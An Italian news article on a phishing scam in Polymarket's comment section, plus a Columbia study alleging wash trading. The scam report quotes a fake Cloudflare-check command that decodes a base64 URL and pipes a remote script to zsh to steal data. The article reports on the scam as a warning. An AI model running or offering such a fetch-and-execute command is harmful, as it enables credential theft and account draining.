Link di phishing nei mercati privati ​​di Polymarket: gli utenti lanciano l'allarme

Polymarket è di nuovo al centro dell'attenzione, questa volta perché uno dei suoi trader più importanti, soprannominato "25usdc", ha lanciato l'allarme su un piano che sfrutta la sezione commenti della piattaforma per approfittarsi di utenti ignari. 

Ciò accade in un momento cruciale per la piattaforma Polymarket, che si sta preparando a rientrare nel mercato statunitense e sta lottando per superare rivali come Kalshi. 

I trader di Polymarket sono in stato di massima allerta 

Secondo 25usdc, gli hacker hanno utilizzato la sezione commenti di Polymarket per mettere in atto una truffa e finora gli utenti hanno perso oltre 500.000 dollari.

"Dicono: 'Perché non fai trading sui mercati privati ​​di Polymarket? Le probabilità sono sempre molto migliori lì!'", ha scritto 25usdc, prima di spiegare come funziona l'intera truffa. 

Secondo lui, tutto inizia con l'acquisto di azioni Yes e No per un mercato da due conti separati. In questo modo, i loro commenti rimangono visibili anche quando il filtro "Titolari" è abilitato. Dopodiché, pubblicano un URL al loro sito in forma offuscata.

L'URL indirizza l'ignaro utente a una pagina dall'aspetto pulito con il logo Polymarket e richiede l'accesso tramite email. Una volta verificata l'email, si apre una nuova finestra che chiede all'utente di verificare la propria attività, imitando CloudFlare. 

Tuttavia 25usdc afferma che quando si fa clic su "Copia", viene copiato un comando simile a questo "curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh" e la prima cosa che fa, se l'utente commette l'errore di incollarlo nel terminale, è decodificare la stringa codificata in base64 (un URL del server), dopodiché recupera uno script da quel server e lo esegue immediatamente. 

Lo script in questione può contenere qualsiasi cosa e, a quanto pare, non verrà visualizzato alcun avviso pop-up; a quel punto il danno è fatto e l'unico rimedio, secondo 25usdc, potrebbe essere la disattivazione del Wi-Fi. 

"Alla fine, raccolgono dati, registrano tutto sul tuo sistema e inviano un file zip al loro server", ha scritto 25usdc. "Poi usano questi dati per accedere ai tuoi account e rubarti i soldi"

Un'altra cosa che ha notato è la cautela con cui il gruppo opera; ad esempio, coprono le loro tracce cambiando spesso portafoglio, offuscano ogni fase del processo e addirittura chiudono il server che invia payload e riceve dati registrati quando non c'è una vittima attiva.

"Credo che il modo migliore per affrontare questo problema sia consentire agli utenti fidati di rivedere i commenti o introdurre un sistema di voti negativi che nasconda i post con un elevato numero di voti negativi", ha concluso 25usdc, sottolineando che il semplice avviso attualmente visualizzato da Polymarket non sarà sufficiente. 

PSA: Non esiste un sito web Polymarket “private market” con “migliori probabilità”

Non inserire mai il tuo indirizzo email Polymarket o il codice di verifica di accesso su siti diversi da quello ufficiale.

— Polymarket Traders (@PolymarketTrade) 9 novembre 2025

Un nuovo studio sostiene che il volume di Polymarket è sostenuto dal wash trading

Come Cryptopolitan riportato, uno studio pubblicato di recente da ricercatori della Columbia University sostiene che il volume di attività su Polymarket sia stato notevolmente gonfiato dal wash trading. 

Il "trading artificiale", come lo hanno definito gli autori, è variato nel tempo, ma affermano che ha rappresentato in media il 25% di tutti gli acquisti e le vendite su Polymarket negli ultimi tre anni. 

Il documento non è stato sottoposto a revisione paritaria, ma è già disponibile sulla piattaforma di ricerca open access SSRN ed è in fase di revisione da parte di Polymarket. 

Per essere chiari, gli autori non accusano esplicitamente Polymarket di aver praticato il wash trading. Tuttavia, hanno evidenziato elementi della struttura della piattaforma di scambio basata sulle criptovalute che rendono plausibile tale affermazione.  

Hanno anche suggerito che i clienti dell'azienda potrebbero essersi impegnati in mododentin tale wash trading nel tentativo di migliorare le loro possibilità di ottenere l'accesso a un token digitale proprietario che il fondatore dell'azienda, Shayne Coplan, ha accennato alla possibilità di lanciare non più tardi dell'8 ottobre. 

"Spero che Polymarket accolga con favore l'analisi contenuta nel nostro articolo", ha dichiarato in un'e-mail Yash Kanoria, professore alla facoltà di economia della Columbia University e uno dei quattro coautori dell'articolo. "Il wash trading non aggiunge liquidità o informazioni al mercato, quindi sembrerebbe utile distinguere il volume autentico da quello non autentico"

Se parte del volume di Polymarket fosse davvero "fittizio", lo studio sostiene che ciò potrebbe alterare la comprensione della forza relativa di Polymarket nel settore e minare anche l'idea attuale secondo cui i mercati predittivi riflettono la "saggezza di una folla più ampia"

"Il potenziale di wash trading su larga scala implica che il volume potrebbe non essere un parametro affidabile per misurare l'autentica attività della piattaforma, soprattutto negli exchange basati sulle criptovalute che potrebbero non disporre di adeguate misure di sicurezza", hanno concluso gli autori.